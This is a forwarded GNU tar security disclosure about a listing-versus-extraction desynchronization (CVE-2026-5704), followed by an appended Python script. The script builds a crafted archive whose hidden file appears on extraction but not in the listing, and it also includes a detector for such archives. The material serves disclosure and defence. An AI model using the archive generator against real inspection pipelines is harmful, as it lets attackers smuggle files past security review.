https://lists.gnu.org/archive/html/bug-tar/2026-03/msg00007.html disclosed:
From:    Guillermo de Angel
Subject: GNU tar: listing/extraction desynchronization allows hidden file injection (tar -t vs tar -x)
Date:    Wed, 18 Mar 2026 15:55:41 +0100

Hello,

I am reporting a security issue in GNU tar 1.35 where tar -t and tar -x produce
different results when processing archives containing non-data-bearing typeflags
(symlink, chardev, blockdev, FIFO) with a non-zero size field.

Summary:

 - tar -t respects the size field and skips the data blocks
 - tar -x ignores the size field and parses the data blocks as headers
 - Result: files embedded in the data region are invisible to listing but are
   created on disk during extraction

This enables hidden file injection: an attacker can craft a small archive
(< 3 KB) where tar -t reports N entries but tar -x creates N+M files.

Any security workflow that relies on tar -t for pre-extraction inspection will
have an incomplete view of the archive contents.

Reproduction (GNU tar 1.35, Ubuntu 24.04):

$ tar -tf desync_chardev.tar
carrier_entry
marker.txt

$ mkdir /tmp/test && tar -xf desync_chardev.tar -C /tmp/test
$ ls /tmp/test/
carrier_entry injected.txt marker.txt
^^^^^^^^^^^^
not in listing

bsdtar 3.7.2 is consistent in both modes (lists and extracts all 3 entries).

Affected typeflags: '2' (symlink), '3' (chardev), '4' (blockdev), '6' (FIFO).
Typeflag '5' (directory) is not affected.

I have attached:

1. Full advisory with root cause analysis and impact assessment
2. Standalone PoC generator (Python 3, no dependencies)
3. Four minimal PoC archives (one per affected typeflag)

I am happy to coordinate on a disclosure timeline. Please let me know if you
need additional information or testing.

Regards,

Guillermo de Angel

Red Hat appears to have assigned CVE-2026-5704 to this issue.

Paul Eggert provided a patch in
https://lists.gnu.org/archive/html/bug-tar/2026-03/msg00011.html
which is also available in
https://cgit.git.savannah.gnu.org/cgit/tar.git/commit/?id=b8d8a61b25588caca4efaf9bdd2e3f1a49da77e3

https://lists.gnu.org/archive/html/bug-tar/2026-03/msg00012.html points out
that a similar report was also included in
https://lists.gnu.org/archive/html/bug-tar/2026-02/msg00022.html
along with a number of other bug reports.

--
        -Alan Coopersmith-                 [email protected]
         Oracle Solaris Engineering - https://blogs.oracle.com/solaris
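As an added illustration that is not part of the forwarded report or of GNU tar's source: the Python script below hand-builds a ustar archive of the shape the report describes (a typeflag '3' character-device entry whose size field covers a complete embedded header for a second file), then walks it two ways. The two walkers are a model of the listing and extraction behaviour the report attributes to tar -t and tar -x, not GNU tar's parser; find_desync_entries() is the pre-extraction check a practitioner would want, flagging any '2'/'3'/'4'/'6' entry with a non-zero size field. Entry names follow the reproduction above; all field offsets are the ustar layout, and the archive it writes can be fed to tar -tf / tar -xf to repeat the report's test.

```python
"""Model of the tar -t / tar -x size-field desynchronization (added example)."""
import sys

BLOCK = 512
# Typeflags the report names as affected: symlink, chardev, blockdev, FIFO.
NON_DATA_TYPES = {b"2", b"3", b"4", b"6"}


def octal(n, width):
    """NUL-terminated octal field of exactly `width` bytes, as ustar expects."""
    return ("%0*o" % (width - 1, n)).encode() + b"\0"


def pad(data):
    """Pad a data region to a whole number of 512-byte blocks."""
    return data + b"\0" * (-len(data) % BLOCK)


def ustar_header(name, typeflag, size, mode=0o644, devmajor=0, devminor=0):
    """Build one 512-byte ustar header with a valid checksum."""
    h = bytearray(BLOCK)
    h[0:100] = name.ljust(100, b"\0")
    h[100:108] = octal(mode, 8)
    h[108:116] = octal(0, 8)          # uid
    h[116:124] = octal(0, 8)          # gid
    h[124:136] = octal(size, 12)      # the field the two code paths disagree on
    h[136:148] = octal(0, 12)         # mtime
    h[148:156] = b"        "          # checksum computed with spaces here
    h[156:157] = typeflag
    h[257:263] = b"ustar\0"
    h[263:265] = b"00"
    h[265:297] = b"root".ljust(32, b"\0")
    h[297:329] = b"root".ljust(32, b"\0")
    h[329:337] = octal(devmajor, 8)
    h[337:345] = octal(devminor, 8)
    h[148:156] = ("%06o" % sum(h)).encode() + b"\0 "
    return bytes(h)


def build_desync_archive():
    """Carrier chardev entry whose 'data' region is a full header+data for a hidden file."""
    hidden = ustar_header(b"injected.txt", b"0", 6) + pad(b"hidden")
    archive = ustar_header(b"carrier_entry", b"3", len(hidden), devmajor=1, devminor=3)
    archive += hidden                                 # lives inside carrier's size span
    archive += ustar_header(b"marker.txt", b"0", 7) + pad(b"visible")
    return archive + b"\0" * (2 * BLOCK)              # end-of-archive marker


def parse_header(block):
    """Return (name, typeflag, size) or None for an all-zero block; verify checksum."""
    if block == b"\0" * BLOCK:
        return None
    stored = int(block[148:156].rstrip(b"\0 ") or b"0", 8)
    calc = sum(block[:148]) + 8 * 0x20 + sum(block[156:])
    if stored != calc:
        raise ValueError("bad header checksum at this block")
    name = block[0:100].rstrip(b"\0").decode()
    size = int(block[124:136].rstrip(b"\0 ") or b"0", 8)
    return name, block[156:157], size


def _walk(archive, honour_size_for_non_data):
    """Walk headers; the flag models whether non-data typeflags skip `size` bytes."""
    names, off = [], 0
    while off + BLOCK <= len(archive):
        hdr = parse_header(archive[off:off + BLOCK])
        if hdr is None:
            break
        name, typeflag, size = hdr
        names.append(name)
        off += BLOCK
        skip = 0 if (typeflag in NON_DATA_TYPES and not honour_size_for_non_data) else size
        off += (skip + BLOCK - 1) // BLOCK * BLOCK
    return names


def list_entries(archive):
    """Model of tar -t per the report: the size field is honoured and data is skipped."""
    return _walk(archive, honour_size_for_non_data=True)


def extract_entries(archive):
    """Model of tar -x per the report: the size field is ignored, data parsed as headers."""
    return _walk(archive, honour_size_for_non_data=False)


def find_desync_entries(archive):
    """Pre-extraction check: non-data-bearing entries with a non-zero size field."""
    flagged, off = [], 0
    while off + BLOCK <= len(archive):
        hdr = parse_header(archive[off:off + BLOCK])
        if hdr is None:
            break
        name, typeflag, size = hdr
        if typeflag in NON_DATA_TYPES and size != 0:
            flagged.append((name, typeflag.decode(), size))
        off += BLOCK + (size + BLOCK - 1) // BLOCK * BLOCK
    return flagged


if __name__ == "__main__":
    tar = build_desync_archive()
    with open("desync_chardev.tar", "wb") as f:
        f.write(tar)
    print("listing model :", list_entries(tar))
    print("extract model :", extract_entries(tar))
    print("flagged       :", find_desync_entries(tar))
    sys.exit(1 if find_desync_entries(tar) else 0)
```

Rejecting an archive when find_desync_entries() returns anything is the simplest mitigation for inspection pipelines that cannot yet run a patched tar: no legitimate symlink, device node or FIFO entry needs a non-zero size field, so the check has no false positives on well-formed ustar input.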
